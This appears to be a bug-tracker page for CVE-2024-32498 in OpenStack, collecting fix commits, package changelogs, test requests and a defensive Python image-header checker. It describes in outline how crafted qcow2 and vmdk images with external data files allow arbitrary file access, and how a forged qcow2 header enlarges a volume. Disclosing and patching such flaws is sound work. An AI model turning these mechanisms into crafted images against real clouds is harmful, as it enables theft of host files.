Date: Mon Jul 1 09:06:40 2024 -0700

    Fix vmdk_allowed_types checking

    This restores the vmdk_allowed_types checking in create_image()
    that was unintentionally lost by tightening the
    qemu-type-matches-glance code in the fetch patch recently. Since we
    are still detecting the format of base images without metadata, we
    would have treated a vmdk file that claims to be raw as raw in fetch,
    but then read it like a vmdk once it was used as a base image for
    something else.

    Conflicts:
      nova/tests/unit/virt/libvirt/test_utils.py
      nova/virt/libvirt/utils.py

    NOTE(elod.illes): conflicts are due to patch to consolidate image
    creation functions (I111cfc8a5eae27b15c6312957255fcf973038ddf) is only
    introduced in zed.

    Change-Id: I07b332a7edb814f6a91661651d9d24bfd6651ae7
    Related-Bug: #2059809
    (cherry picked from commit 08be7b2a0dc1d7728d8034bc2aab0428c4fb642e)
    (cherry picked from commit 11301e7e3f0d81a3368632f90608e30d9c647111)
    (cherry picked from commit 70a435fd519a0ebcc3ac9ad5254fefbf19c93e48)
    (cherry picked from commit f732f8476851e6272d8ad9937f54b918795844e8)
    (cherry picked from commit a2acb31d790e6cb41c067bfc0343bde274c9428c)

James Page (james-page)
Changed in cloud-archive:
status: Fix Released → Fix Committed
Revision history for this message
James Page (james-page) wrote :

This bug was fixed in the package glance - 2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1~cloud0
---------------

 glance (2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1~cloud0) noble-dalmatian; urgency=medium
 .
   * New upstream release for the Ubuntu Cloud Archive.
 .
 glance (2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1) oracular; urgency=medium
 .
   * New upstream snapshot for OpenStack Dalmatian.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/CVE*.patch: Drop, included in snapshot.
 .
 glance (2:28.0.1-0ubuntu3) oracular; urgency=medium
 .
   * SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data
     (LP: #2059809)
     - debian/patches/CVE-2024-32498-1.patch: reject qcow files with
       data-file attributes.
     - debian/patches/CVE-2024-32498-2.patch: extend format_inspector for
       QCOW safety.
     - debian/patches/CVE-2024-32498-3.patch: add VMDK safety check.
     - debian/patches/CVE-2024-32498-4.patch: reject unsafe qcow and vmdk
       files.
     - debian/patches/CVE-2024-32498-5.patch: add QED format detection to
       format_inspector.
     - debian/patches/CVE-2024-32498-6.patch: add file format detection to
       format_inspector.
     - debian/patches/CVE-2024-32498-7.patch: add safety check and detection
       support to FI tool.
     - CVE-2024-32498

Changed in cloud-archive:
status: Fix Committed → Fix Released
Revision history for this message
James Page (james-page) wrote :

This bug was fixed in the package nova - 3:29.1.0+git2024080716.bb2d7f9c-0ubuntu1~cloud0
---------------

 nova (3:29.1.0+git2024080716.bb2d7f9c-0ubuntu1~cloud0) noble-dalmatian; urgency=medium
 .
   * New upstream release for the Ubuntu Cloud Archive.
 .
 nova (3:29.1.0+git2024080716.bb2d7f9c-0ubuntu1) oracular; urgency=medium
 .
   * New upstream snapshot for OpenStack Dalmatian.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/test-hacking-compat.patch: Drop, included upstream.
   * d/p/oslo.versionedobjects-compat.patch: Drop, similar included
     upstream.
   * d/p/CVE*.patch: Drop, included in snapshot.
 .
 nova (3:29.0.1-0ubuntu4) oracular; urgency=medium
 .
   * SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data
     (LP: #2059809)
     - debian/patches/CVE-2024-32498-1.patch: reject qcow files with
       data-file attributes.
     - debian/patches/CVE-2024-32498-2.patch: check images with
       format_inspector for safety.
     - debian/patches/CVE-2024-32498-3.patch: additional qemu safety
       checking on base images.
     - debian/patches/CVE-2024-32498-4.patch: fix vmdk_allowed_types
       checking.
     - CVE-2024-32498

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to cinder (unmaintained/yoga)

Reviewed: https://review.opendev.org/c/openstack/cinder/+/923873
Committed: https://opendev.org/openstack/cinder/commit/0c3c65376f1aa46b35bedb4b59eac0bf8cc5979e
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit 0c3c65376f1aa46b35bedb4b59eac0bf8cc5979e
Author: Brian Rosmaita <email address hidden>
Date: Wed Jun 26 14:09:30 2024 -0400

    CVE-2024-32498: Check for external qcow2 data file

    Adds code to image_utils to check for a qcow2 external data
    file, a recent feature of qemu which we do not support and
    which can be used maliciously.

    Advice from the qemu-img community is that it is dangerous
    to call qemu-img info on untrusted files, so we copy over
    the format_inspector module from Glance. This performs basic
    analysis on the image data file so we can detect problematic
    images before we call qemu-img info to get all the image
    attributes. It is expected that this code will eventually be
    added to oslo so it can be consumed by Glance, Cinder, and
    Nova.

    Because cinder itself may create qcow2 format images with a
    backing file in nfs-based backends, the glance format_inspector
    has been modified to optionally allow such files. Since we are
    monkeying with the format_inspector code, we also copy over
    its unit tests to prevent regressions and to add tests for the
    changed code.

    Includes an additional fix to prevent an issue where a user
    could mount a raw volume and write a qcow2 header with a larger
    virtual size on it. On reattaching the volume it would have the
    new larger virtual size available without actually changing
    the size value in cinder. While we cannot prevent this we can
    prevent the user from using this volume again, which makes this
    exploit pointless.

    unmaintained/yoga only: The tests
    cinder.tests.unit.volume.drivers.test_quobyte.QuobyteDriverTestCase.
    * test_copy_volume_from_snapshot_not_cached_overlay
    * test_copy_volume_from_snapshot
    * test_copy_volume_from_snapshot_not_cached
    failed as the convert_image mock was not called; remove this mock
    from yoga and older branches.

    With an older qemu installed, one of the qemu-img create commands
    fails, so skip it on unmaintained/yoga and older branches in
    test_qcow2_safety_checks.

    Co-authored-by: Dan Smith <email address hidden>
    Co-authored-by: Felix Huettner <email address hidden>

    Change-Id: I65857288b797cde573e7443ac6e7e6f57fedde01
    Closes-bug: #2059809
    (cherry picked from commit 4aa6590a483901de64e0d162fff11f3d2d7f9977)
    (cherry picked from commit d6a186945e03649343af55b46ed8dfe0dd326e40)
    (cherry picked from commit db98dc207060da234c32a563c13cac1edbd62952)
    (cherry picked from commit 9e667b02b2c20b4ada18c1a472be152956284d45)
    (cherry picked from commit 5f5e86e3542866227b7339713148b5169d069f21)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (master)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923676
Committed: https://opendev.org/openstack/glance/commit/d8de63a5008b811f2e22cc5cdda59bd2cc05b207
Submitter: "Zuul (22348)"
Branch: master

commit d8de63a5008b811f2e22cc5cdda59bd2cc05b207
Author: Abhishek Kekane <email address hidden>
Date: Mon Jul 8 19:28:38 2024 +0000

    Add iso file format inspector

    This change excludes image conversion if source image
    format is ISO.

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: Id706480e31687d8ade6f7199b600aff3ad7c68f7
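
As an added illustration of the header-level checks described in the cinder commit above (CVE-2024-32498: Check for external qcow2 data file) and in this iso-inspector commit, here is a small Python checker that is not code from cinder, glance or nova and is far narrower than their format_inspector. It reads the qcow2 incompatible_features bit 2 (external data file) and the backing-file fields from the header, names every format whose signature matches (qcow2 magic at offset 0, ISO 9660 "CD001" at offset 0x8001) and rejects ambiguous or mismatching images; `make_qcow2_header` is an assumption for the demo that builds constructed sample headers, not a real image.

```python
import struct

QCOW_MAGIC = b"QFI\xfb"
ISO_MAGIC = b"CD001"
ISO_MAGIC_OFFSET = 0x8001  # ISO 9660 primary volume descriptor identifier
QCOW2_INCOMPAT_EXTERNAL_DATA = 1 << 2  # incompatible_features bit 2 per qcow2 spec


def inspect_qcow2(data):
    """Describe the qcow2 header in `data`; None if it is not a qcow2 header."""
    if len(data) < 104 or data[:4] != QCOW_MAGIC:
        return None
    # version, backing_file_offset and backing_file_size live at bytes 4..20
    version, backing_off, backing_size = struct.unpack(">IQI", data[4:20])
    features = struct.unpack(">Q", data[72:80])[0] if version >= 3 else 0
    return {
        "version": version,
        "has_backing_file": backing_off != 0 and backing_size != 0,
        "has_data_file": bool(features & QCOW2_INCOMPAT_EXTERNAL_DATA),
    }


def detect_format(data):
    """Return every format whose signature matches; the caller rejects ambiguity."""
    matches = []
    if data[:4] == QCOW_MAGIC:
        matches.append("qcow2")
    if data[ISO_MAGIC_OFFSET:ISO_MAGIC_OFFSET + 5] == ISO_MAGIC:
        matches.append("iso")
    return matches


def is_safe(data, claimed_format):
    """(ok, reason): reject ambiguous, mismatching, backing- or data-file images."""
    found = detect_format(data)
    if len(found) > 1:
        return False, "multiple formats match: " + ",".join(found)
    detected = found[0] if found else "raw"
    if claimed_format != detected:  # e.g. a raw volume that now carries a qcow2 header
        return False, "claims %s but looks like %s" % (claimed_format, detected)
    if detected == "qcow2":
        hdr = inspect_qcow2(data)
        if hdr["has_backing_file"]:
            return False, "qcow2 has a backing file"
        if hdr["has_data_file"]:
            return False, "qcow2 has an external data file"
    return True, "ok"


def make_qcow2_header(backing=False, data_file=False):
    """Constructed sample (assumption for the demo): a minimal v3 header."""
    hdr = bytearray(512)
    hdr[0:4] = QCOW_MAGIC
    struct.pack_into(">I", hdr, 4, 3)  # version 3
    if backing:
        struct.pack_into(">QI", hdr, 8, 0x100, 11)  # backing_file_offset, size
    struct.pack_into(">IQ", hdr, 20, 16, 1 << 30)  # cluster_bits, virtual size
    struct.pack_into(">Q", hdr, 72, QCOW2_INCOMPAT_EXTERNAL_DATA if data_file else 0)
    struct.pack_into(">I", hdr, 100, 104)  # header_length
    return bytes(hdr)
```

In practice the first 64 KiB of the file (enough to cover the ISO descriptor offset) is what such a check reads before anything is handed to qemu-img.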

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to glance (stable/2024.1)

Related fix proposed to branch: stable/2024.1
Review: https://review.opendev.org/c/openstack/glance/+/927459

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (stable/2024.1)

Reviewed: https://review.opendev.org/c/openstack/glance/+/927459
Committed: https://opendev.org/openstack/glance/commit/eed2a8aeb7a2e1ba47ff5642a346a97e85b6b0ff
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit eed2a8aeb7a2e1ba47ff5642a346a97e85b6b0ff
Author: Abhishek Kekane <email address hidden>
Date: Mon Jul 8 19:28:38 2024 +0000

    Add iso file format inspector

    This change excludes image conversion if source image
    format is ISO.

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: Id706480e31687d8ade6f7199b600aff3ad7c68f7
    (cherry picked from commit d8de63a5008b811f2e22cc5cdda59bd2cc05b207)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to glance (stable/2023.2)

Related fix proposed to branch: stable/2023.2
Review: https://review.opendev.org/c/openstack/glance/+/927568

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (stable/2023.2)

Reviewed: https://review.opendev.org/c/openstack/glance/+/927568
Committed: https://opendev.org/openstack/glance/commit/5b4be5b6f2f67ec8e61bceff8c2ed79b870aace0
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 5b4be5b6f2f67ec8e61bceff8c2ed79b870aace0
Author: Abhishek Kekane <email address hidden>
Date: Mon Jul 8 19:28:38 2024 +0000

    Add iso file format inspector

    This change excludes image conversion if source image
    format is ISO.

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: Id706480e31687d8ade6f7199b600aff3ad7c68f7
    (cherry picked from commit d8de63a5008b811f2e22cc5cdda59bd2cc05b207)
    (cherry picked from commit eed2a8aeb7a2e1ba47ff5642a346a97e85b6b0ff)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to glance (stable/2023.1)

Related fix proposed to branch: stable/2023.1
Review: https://review.opendev.org/c/openstack/glance/+/927580

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (stable/2023.1)

Reviewed: https://review.opendev.org/c/openstack/glance/+/927580
Committed: https://opendev.org/openstack/glance/commit/1427857a7d2a823bb754cf2f12f2b10e7b3df31d
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 1427857a7d2a823bb754cf2f12f2b10e7b3df31d
Author: Abhishek Kekane <email address hidden>
Date: Mon Jul 8 19:28:38 2024 +0000

    Add iso file format inspector

    This change excludes image conversion if source image
    format is ISO.

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: Id706480e31687d8ade6f7199b600aff3ad7c68f7
    (cherry picked from commit d8de63a5008b811f2e22cc5cdda59bd2cc05b207)
    (cherry picked from commit eed2a8aeb7a2e1ba47ff5642a346a97e85b6b0ff)
    (cherry picked from commit 5b4be5b6f2f67ec8e61bceff8c2ed79b870aace0)

Revision history for this message
James Page (james-page) wrote : Please test proposed package

Hello Martin, or anyone else affected,

Accepted cinder into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository.

Please help us by testing this new package. To enable the -proposed repository:

  sudo add-apt-repository cloud-archive:ussuri-proposed
  sudo apt-get update

Your feedback will aid us getting this update out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision.

Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance!

tags: added: verification-ussuri-needed
Revision history for this message
James Page (james-page) wrote :

Hello Martin, or anyone else affected,

Accepted glance into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository.

Please help us by testing this new package. To enable the -proposed repository:

  sudo add-apt-repository cloud-archive:ussuri-proposed
  sudo apt-get update

Your feedback will aid us getting this update out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision.

Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance!

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (unmaintained/yoga)

Reviewed: https://review.opendev.org/c/openstack/nova/+/925592
Committed: https://opendev.org/openstack/nova/commit/e7c2281b03a9eb52281ada9273938ad0d5c52202
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit e7c2281b03a9eb52281ada9273938ad0d5c52202
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)
    (cherry picked from commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48)
    (cherry picked from commit 65f0789df05e2ba7f11c0eaf2c6959367acbced2)
    (cherry picked from commit e8f00617ed319aa37f6946cf10883eef6d180612)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Reviewed: https://review.opendev.org/c/openstack/nova/+/925594
Committed: https://opendev.org/openstack/nova/commit/76c43c4c56221cb836cf07b2df749cd94ec276e1
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit 76c43c4c56221cb836cf07b2df749cd94ec276e1
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some versions of mkisofs do not properly handle the case where both the
    input and the output file of the command are the same. So this commit
    changes the unit tests depending on that binary to use different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)
    (cherry picked from commit 02147b36d35e1e462e1405c36a2e67a33de806de)
    (cherry picked from commit 47428f6caf503b94583dac614b59971f60a0ba9c)
    (cherry picked from commit 11613e7b3244958fa8d0b5253a185287d1ade2d8)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to glance (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923307
Committed: https://opendev.org/openstack/glance/commit/63ac35e3248ceed3176a65cdccbbf06f69b3c58e
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 63ac35e3248ceed3176a65cdccbbf06f69b3c58e
Author: Dan Smith <email address hidden>
Date: Tue Apr 16 11:20:48 2024 -0700

    Reject unsafe qcow and vmdk files

    This causes us to use the format inspector to pre-examine qcow and
    vmdk files for safe configurations before even using qemu-img
    on them.

    Depends-On: https://review.opendev.org/c/openstack/glance/+/923861
    Change-Id: I0554706368e573e11f649c09569f7c21cbc8634b
    Closes-Bug: #2059809
    (cherry picked from commit a95f335bca1dfdd1c904ae475e9fe8c6806f2c56)
    (cherry picked from commit 55fc42563818fcf88b474233df242a796c918b3a)
    (cherry picked from commit f1f53075d69a9a1c006b3e25506e30eb0210de1f)
    (cherry picked from commit c1c54abeaba91ae0030d4acf01a91339b60a2d7d)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/cinder 25.0.0.0rc1

This issue was fixed in the openstack/cinder 25.0.0.0rc1 release candidate.
